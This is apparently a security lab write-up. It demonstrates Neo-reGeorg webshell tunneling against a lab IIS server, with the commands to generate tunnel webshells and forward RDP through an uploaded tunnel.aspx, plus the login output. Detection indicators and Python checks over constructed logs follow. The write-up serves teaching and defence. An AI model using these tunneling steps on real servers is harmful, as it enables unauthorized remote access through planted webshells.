Week 2
For this exercise I will use the tool https://github.com/L-codes/Neo-reGeorg against an IIS web server running on Windows Server 2022.
Test
First, git clone the repository, then install the requests library (with its SOCKS extra):
┌──(kali㉿kali)-[~/Desktop/VCS]
└─$ git clone https://github.com/L-codes/Neo-reGeorg.git
Cloning into 'Neo-reGeorg'...
remote: Enumerating objects: 1031, done.
remote: Counting objects: 100% (269/269), done.
remote: Compressing objects: 100% (198/198), done.
remote: Total 1031 (delta 75), reused 73 (delta 71), pack-reused 762 (from 3)
Receiving objects: 100% (1031/1031), 429.46 KiB | 2.04 MiB/s, done.
Resolving deltas: 100% (653/653), done.
┌──(kali㉿kali)-[~/Desktop/VCS]
└─$ cd Neo-reGeorg
┌──(kali㉿kali)-[~/Desktop/VCS/Neo-reGeorg]
└─$ pip install requests requests[socks]
Defaulting to user installation because normal site-packages is not writeable
Requirement already satisfied: requests in /usr/lib/python3/dist-packages (2.31.0)
Requirement already satisfied: PySocks!=1.5.7,>=1.5.6 in /usr/lib/python3/dist-packages (from requests[socks]) (1.7.1)
Next, generate the tunnel shell file to upload to the server, using the password "trungpq6":
┌──(kali㉿kali)-[~/Desktop/VCS/Neo-reGeorg]
└─$ python neoreg.py generate -k trungpq6
"$$$$$$'' 'M$ '$$$@m
:$$$$$$$$$$$$$$''$$$$'
'$' 'JZI'$$& $$$$'
'$$$ '$$$$
$$$$ J$$$$'
m$$$$ $$$$,
$$$$@ '$$$$_ Neo-reGeorg
'1t$$$$' '$$$$<
'$$$$$$$$$$' $$$$ version 5.2.0
'@$$$$' $$$$'
'$$$$ '$$$@
'z$$$$$$ @$$$
r$$$ $$|
'$$v c$$
'$$v $$v$$$$$$$$$#
$$x$$$$$$$$$twelve$$$@$'
@$$$@L ' '<@$$$$$$$$`
$$ '$$$
[ Github ] https://github.com/L-codes/Neo-reGeorg
[+] Mkdir a directory: neoreg_servers
[+] Create neoreg server files:
=> neoreg_servers/tunnel.jspx
=> neoreg_servers/tunnel.cs
=> neoreg_servers/tunnel.php
=> neoreg_servers/tunnel.aspx
=> neoreg_servers/tunnel.jsp
=> neoreg_servers/tunnel.go
=> neoreg_servers/tunnel.ashx
Assume the attacker has already managed to upload the webshell to the server by some means.
Now we create an HTTP tunnel to port 3389 (RDP), listening locally on port 2706:
┌──(kali㉿kali)-[~/Desktop/VCS/Neo-reGeorg]
└─$ python neoreg.py -k trungpq6 -u http://192.168.23.100/uploads/tunnel.aspx -p 2706 -t 192.168.23.100:3389
+------------------------------------------------------------------------+
Log Level set to [ERROR]
Starting Forward [127.0.0.1:2706] => [192.168.23.100:3389]
Tunnel at:
http://192.168.23.100/uploads/tunnel.aspx
+------------------------------------------------------------------------+
Connecting over RDP to 127.0.0.1:2706, we see that the RDP session into the winserver22 machine succeeds (the certificate warnings below are expected, since the connection is addressed to the local tunnel endpoint rather than the server's hostname).
xfreerdp /u:TRUNGPQ6\\Administrator /p:xxxxxxxxx /v:127.0.0.1:2706
[03:23:20:791] [201281:201290] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[03:23:20:791] [201281:201290] [WARN][com.freerdp.crypto] - CN = WIN-7PB89AEMJNR.trungpq6.com
[03:23:20:794] [201281:201290] [ERROR][com.freerdp.crypto] - @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[03:23:20:794] [201281:201290] [ERROR][com.freerdp.crypto] - @ WARNING: CERTIFICATE NAME MISMATCH! @
[03:23:20:794] [201281:201290] [ERROR][com.freerdp.crypto] - @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[03:23:20:794] [201281:201290] [ERROR][com.freerdp.crypto] - The hostname used for this connection (127.0.0.1:2706)
[03:23:20:795] [201281:201290] [ERROR][com.freerdp.crypto] - does not match the name given in the certificate:
[03:23:20:795] [201281:201290] [ERROR][com.freerdp.crypto] - Common Name (CN):
[03:23:20:795] [201281:201290] [ERROR][com.freerdp.crypto] - WIN-7PB89AEMJNR.trungpq6.com
[03:23:20:795] [201281:201290] [ERROR][com.freerdp.crypto] - A valid certificate for the wrong name should NOT be trusted!
Certificate details for 127.0.0.1:2706 (RDP-Server):
Common Name: WIN-7PB89AEMJNR.trungpq6.com
Subject: CN = WIN-7PB89AEMJNR.trungpq6.com
Issuer: CN = WIN-7PB89AEMJNR.trungpq6.com
Thumbprint: cb:37:9d:94:01:45:85:6e:0d:6b:5f:84:13:db:bb:c0:1c:66:0e:91:7b:19:cc:af:25:72:a6:77:a0:4f:27:7d
The above X.509 certificate could not be verified, possibly because you do not have
the CA certificate in your certificate store, or the certificate has expired.
Please look at the OpenSSL documentation on how to add a private CA to the store.
Do you trust the above certificate? (Y/T/N) Y
[03:23:30:993] [201281:201290] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32
[03:23:30:993] [201281:201290] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGRA32
[03:23:30:123] [201281:201290] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[03:23:30:124] [201281:201290] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx
Detect
Checking the IIS access log, we see a very large number of POST requests to this webshell.
Event ID 4624 with logon type 10 (RemoteInteractive), where the source address is the winserver machine itself.
Sysmon event ID 3: w3wp (the IIS worker process) connecting to port 3389.
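Added example (not part of this lab): Python checks for the three indicators listed above, run over constructed sample records. The IIS log field layout, the attacker address 192.168.23.50, the timestamps and the parsed-event dict keys are assumptions made for this demonstration.

```python
"""Added detection checks for the three indicators above; all records below are constructed samples."""
from collections import Counter

# Constructed IIS W3C log excerpt (attacker address 192.168.23.50 and times are made up).
IIS_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip cs(User-Agent) sc-status
2024-05-01 03:22:01 192.168.23.100 GET /index.html - 80 192.168.23.50 Mozilla/5.0 200
2024-05-01 03:23:10 192.168.23.100 POST /uploads/tunnel.aspx - 80 192.168.23.50 python-requests/2.31.0 200
2024-05-01 03:23:10 192.168.23.100 POST /uploads/tunnel.aspx - 80 192.168.23.50 python-requests/2.31.0 200
2024-05-01 03:23:11 192.168.23.100 POST /uploads/tunnel.aspx - 80 192.168.23.50 python-requests/2.31.0 200
2024-05-01 03:23:11 192.168.23.100 POST /uploads/tunnel.aspx - 80 192.168.23.50 python-requests/2.31.0 200
2024-05-01 03:23:12 192.168.23.100 POST /uploads/tunnel.aspx - 80 192.168.23.50 python-requests/2.31.0 200
"""

def webshell_post_bursts(log_text, threshold=5):
    """Count POSTs per (client IP, URI) using the #Fields header; return pairs at or over threshold."""
    fields, counts = None, Counter()
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # column names for the lines that follow
        elif line and not line.startswith("#") and fields:
            rec = dict(zip(fields, line.split()))
            if rec.get("cs-method") == "POST":
                counts[(rec["c-ip"], rec["cs-uri-stem"])] += 1
    return {k: v for k, v in counts.items() if v >= threshold}

# Constructed Sysmon Event ID 3 (network connection) records, already parsed into dicts.
SYSMON_EVENTS = [
    {"EventID": 3, "Image": r"C:\Windows\System32\inetsrv\w3wp.exe", "DestinationIp": "192.168.23.100", "DestinationPort": 3389},
    {"EventID": 3, "Image": r"C:\Windows\System32\svchost.exe", "DestinationIp": "192.168.23.1", "DestinationPort": 53},
]

def w3wp_to_rdp(events, rdp_port=3389):
    """The IIS worker process opening a connection to the RDP port is the tunnel's server-side footprint."""
    return [e for e in events if e.get("EventID") == 3
            and e.get("Image", "").lower().endswith("\\w3wp.exe")
            and e.get("DestinationPort") == rdp_port]

# Constructed Security 4624 records; the tunnelled session logs on from the server's own address.
SECURITY_EVENTS = [
    {"EventID": 4624, "LogonType": 10, "TargetUserName": "Administrator", "IpAddress": "192.168.23.100"},
    {"EventID": 4624, "LogonType": 10, "TargetUserName": "Administrator", "IpAddress": "192.168.23.50"},
]

def self_sourced_rdp_logons(events, local_addrs=("127.0.0.1", "::1", "192.168.23.100")):
    """RDP logons (type 10) whose source address is the server itself rather than a workstation."""
    return [e for e in events if e.get("EventID") == 4624
            and e.get("LogonType") == 10 and e.get("IpAddress") in local_addrs]
```

Each function returns the matching records, so the same logic can be pointed at real exported logs once the field names are adjusted to the collector in use.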